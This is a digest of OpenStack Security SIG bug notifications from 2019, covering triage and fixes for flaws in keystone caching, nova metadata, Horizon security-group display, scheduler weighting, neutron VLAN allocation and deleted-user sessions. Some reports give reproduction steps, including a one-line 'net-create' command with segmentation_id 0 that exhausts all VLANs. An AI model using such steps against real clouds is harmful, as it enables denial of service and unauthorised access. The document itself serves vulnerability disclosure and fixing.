From lbragstad at gmail.com Wed Sep 4 16:52:17 2019 From: lbragstad at gmail.com (Lance Bragstad) Date: Wed, 04 Sep 2019 16:52:17 -0000 Subject: [Openstack-security] [Bug 1578466] Re: oslo.cache should offer encryption in a similar manner to keystonemiddleware References: <20160505031406.17572.11746.malonedeb@soybean.canonical.com> Message-ID: <156761593784.17269.11487011463741085812.launchpad@gac.canonical.com> ** Description changed: Keystone middleware's caching of tokens offers HMAC validation and encryption of the tokens in the cache. This is important because memcache has literally zero authentication or protection from any user on the system. So this feature should be ported in from keystone middleware into keystone. + + Encrypted caching implementation: https://opendev.org/openstack/keystonemiddleware/src/commit/0a65b1420799e7c7f8736e9f6c234f755ab5ac6b/keystonemiddleware/auth_token/_cache.py#L254-L297 + Caching configuration via ksm: https://opendev.org/openstack/keystonemiddleware/src/commit/0a65b1420799e7c7f8736e9f6c234f755ab5ac6b/keystonemiddleware/auth_token/_opts.py#L113-L122 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1578466 Title: oslo.cache should offer encryption in a similar manner to keystonemiddleware Status in OpenStack Identity (keystone): Won't Fix Status in oslo.cache: Confirmed Bug description: Keystone middleware's caching of tokens offers HMAC validation and encryption of the tokens in the cache. This is important because memcache has literally zero authentication or protection from any user on the system. So this feature should be ported in from keystone middleware into keystone. Encrypted caching implementation: https://opendev.org/openstack/keystonemiddleware/src/commit/0a65b1420799e7c7f8736e9f6c234f755ab5ac6b/keystonemiddleware/auth_token/_cache.py#L254-L297 Caching configuration via ksm: https://opendev.org/openstack/keystonemiddleware/src/commit/0a65b1420799e7c7f8736e9f6c234f755ab5ac6b/keystonemiddleware/auth_token/_opts.py#L113-L122 To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1578466/+subscriptions From gagehugo at gmail.com Thu Sep 5 15:19:34 2019 From: gagehugo at gmail.com (Gage Hugo) Date: Thu, 05 Sep 2019 15:19:34 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <156769677422.435.13287539548721203392.malone@wampee.canonical.com> Agreed on C1 for this. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From fungi at yuggoth.org Thu Sep 5 14:52:34 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 05 Sep 2019 14:52:34 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <156769515432.6589.8573733864708702347.malone@soybean.canonical.com> Reviewing our taxonomy, this probably fits closest as a class C1 report due to depending on the existence of other exploitable bugs to leverage. https://security.openstack.org/vmt-process.html#incident-report-taxonomy ** Information type changed from Private Security to Public ** Changed in: ossa Status: Incomplete => Won't Fix ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From 1841933 at bugs.launchpad.net Thu Sep 5 15:06:58 2019 From: 1841933 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 05 Sep 2019 15:06:58 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <156769602031.1159.2950855130621818631.launchpad@wampee.canonical.com> ** Changed in: nova Status: New => In Progress -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From fungi at yuggoth.org Thu Sep 5 17:15:23 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 05 Sep 2019 17:15:23 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <156770372495.29497.5155189746705580606.launchpad@chaenomeles.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From 1824248 at bugs.launchpad.net Thu Sep 12 20:06:53 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 12 Sep 2019 20:06:53 -0000 Subject: [Openstack-security] [Bug 1824248] Fix proposed to neutron (master) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <156831881378.16566.6955098732031934554.malone@gac.canonical.com> Fix proposed to branch: master Review: https://review.opendev.org/681910 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Thu Sep 12 20:13:54 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 12 Sep 2019 20:13:54 -0000 Subject: [Openstack-security] [Bug 1824248] Related fix proposed to neutron-tempest-plugin (master) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <156831923447.16948.15624103023818108962.malone@gac.canonical.com> Related fix proposed to branch: master Review: https://review.opendev.org/681912 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From fungi at yuggoth.org Fri Sep 13 17:33:53 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 13 Sep 2019 17:33:53 -0000 Subject: [Openstack-security] [Bug 1818239] Re: scheduler: build failure high negative weighting References: <155144918750.17390.5769092718170590059.malonedeb@soybean.canonical.com> Message-ID: <156839603345.425.12357429312427701428.malone@wampee.canonical.com> Since this has come up again in bug 1581977 as representing a security- related concern, I'm adding the security bugtag to it for increased visibility. Note this is not the same as treating it as a security vulnerability, and I don't have the impression that any CVE assignment or security advisory is warranted for this. ** Information type changed from Public Security to Public ** Also affects: ossa Importance: Undecided Status: New ** Changed in: ossa Status: New => Won't Fix ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1818239 Title: scheduler: build failure high negative weighting Status in OpenStack nova-cloud-controller charm: Fix Released Status in OpenStack Compute (nova): Incomplete Status in OpenStack Security Advisory: Won't Fix Status in nova package in Ubuntu: Triaged Bug description: Whilst debugging a Queens cloud which seems to be landing all new instances on 3 out of 9 hypervisors (which resulted in three very heavily overloaded servers) I noticed that the weighting of the build failure weighter is -1000000.0 * number of failures: https://github.com/openstack/nova/blob/master/nova/conf/scheduler.py#L495 This means that a server which has any sort of build failure instantly drops to the bottom of the weighed list of hypervisors for scheduling of instances. Why might a instance fail to build? Could be a timeout due to load, might also be due to a bad image (one that won't actually boot under qemu). This second cause could be triggered by an end user of the cloud inadvertently causing all instances to be pushed to a small subset of hypervisors (which is what I think happened in our case). This feels like quite a dangerous default to have given the potential to DOS hypervisors intentionally or otherwise. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: nova-scheduler 2:17.0.7-0ubuntu1 ProcVersionSignature: Ubuntu 4.15.0-43.46-generic 4.15.18 Uname: Linux 4.15.0-43-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.5 Architecture: amd64 Date: Fri Mar 1 13:57:39 2019 NovaConf: Error: [Errno 13] Permission denied: '/etc/nova/nova.conf' PackageArchitecture: all ProcEnviron: TERM=screen-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=C.UTF-8 SHELL=/bin/bash SourcePackage: nova UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/charm-nova-cloud-controller/+bug/1818239/+subscriptions From 1840895 at bugs.launchpad.net Mon Sep 16 15:40:31 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 16 Sep 2019 15:40:31 -0000 Subject: [Openstack-security] [Bug 1840895] Re: segment parameter check failed when creating network References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156864843178.13411.1302237967966791858.malone@gac.canonical.com> Reviewed: https://review.opendev.org/679510 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=f01f3ae5dd0dd7dd9aa513a1b50e04e20a08b97b Submitter: Zuul Branch: master commit f01f3ae5dd0dd7dd9aa513a1b50e04e20a08b97b Author: Slawek Kaplonski Date: Fri Aug 30 22:32:19 2019 +0200 Fix creation of vlan network with segmentation_id set to 0 In case when vlan network was created with segmentation_id=0 and without physical_network given, it was passing validation of provider segment and first available segmentation_id was choosen for network. Problem was that in such case all available segmentation ids where allocated and no other vlan network could be created later. This patch fixes validation of segmentation_id when it is set to value 0. Change-Id: Ic768deb84d544db832367f9a4b84a92729eee620 Closes-bug: #1840895 ** Changed in: neutron Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Tue Sep 17 07:00:29 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 17 Sep 2019 07:00:29 -0000 Subject: [Openstack-security] [Bug 1840895] Fix proposed to neutron (stable/stein) References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156870362941.504.6469634524896376941.malone@wampee.canonical.com> Fix proposed to branch: stable/stein Review: https://review.opendev.org/682557 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Tue Sep 17 07:00:46 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 17 Sep 2019 07:00:46 -0000 Subject: [Openstack-security] [Bug 1840895] Fix proposed to neutron (stable/rocky) References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156870364623.4548.2200167894476769029.malone@chaenomeles.canonical.com> Fix proposed to branch: stable/rocky Review: https://review.opendev.org/682558 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Tue Sep 17 07:01:00 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 17 Sep 2019 07:01:00 -0000 Subject: [Openstack-security] [Bug 1840895] Fix proposed to neutron (stable/queens) References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156870366056.4548.5929678126225878182.malone@chaenomeles.canonical.com> Fix proposed to branch: stable/queens Review: https://review.opendev.org/682559 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Thu Sep 19 10:11:54 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 19 Sep 2019 10:11:54 -0000 Subject: [Openstack-security] [Bug 1840895] Fix included in openstack/neutron 15.0.0.0b1 References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <156888791484.13660.18360014417264119768.malone@gac.canonical.com> This issue was fixed in the openstack/neutron 15.0.0.0b1 development milestone. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1824248 at bugs.launchpad.net Thu Sep 19 10:13:44 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 19 Sep 2019 10:13:44 -0000 Subject: [Openstack-security] [Bug 1824248] Fix included in openstack/neutron 15.0.0.0b1 References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <156888802461.13927.12556205472513095971.malone@gac.canonical.com> This issue was fixed in the openstack/neutron 15.0.0.0b1 development milestone. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From fungi at yuggoth.org Thu Sep 19 14:51:22 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 19 Sep 2019 14:51:22 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156890468258.5220.7066900126018275014.malone@chaenomeles.canonical.com> Thanks, I'm marking our security advisory task "won't fix" and lifting the private embargo, treating this as a class D report indicating a need for documentation improvements: https://security.openstack.org/vmt- process.html#incident-report-taxonomy ** Changed in: ossa Status: Incomplete => Won't Fix ** Tags added: security ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions From 1842930 at bugs.launchpad.net Thu Sep 19 15:12:40 2019 From: 1842930 at bugs.launchpad.net (Akihiro Motoki) Date: Thu, 19 Sep 2019 15:12:40 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156890596051.32759.851593505395098577.malone@wampee.canonical.com> > Thank you for pointing the SESSION_TIMEOUT option. I was looking through Horizon options to mitigate this problem and thought about using it. For more detail, there are two options involved in horizon. - SESSION_TIMEOUT - SESSION_REFRESH If SESSION_REFRESH is set to True (current default), a shorter SESSION_TIMEOUT would not matter for most cases. > So is the default keystonemiddleware cache expiration time in such deployment equals to 300 sec? Although I can look up token's expiration time, issuing "openstack token issue" command. The default value is defined here [1]. You can test the timeout of keystonemiddlware cache using curl. [2] is an example in my devstack environment. L.39-49 retrieves a token before the user is deleted and tests it works. L.81 confirms the token is still valid just after the user is deleted. I confirmed the curl command failed with auth error a couple of minuites later (though the paste does not cover it). You can try the similar. [1] https://opendev.org/openstack/keystonemiddleware/src/branch/master/keystonemiddleware/auth_token/_opts.py#L107-L112 [2] http://paste.openstack.org/show/777693/ -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about 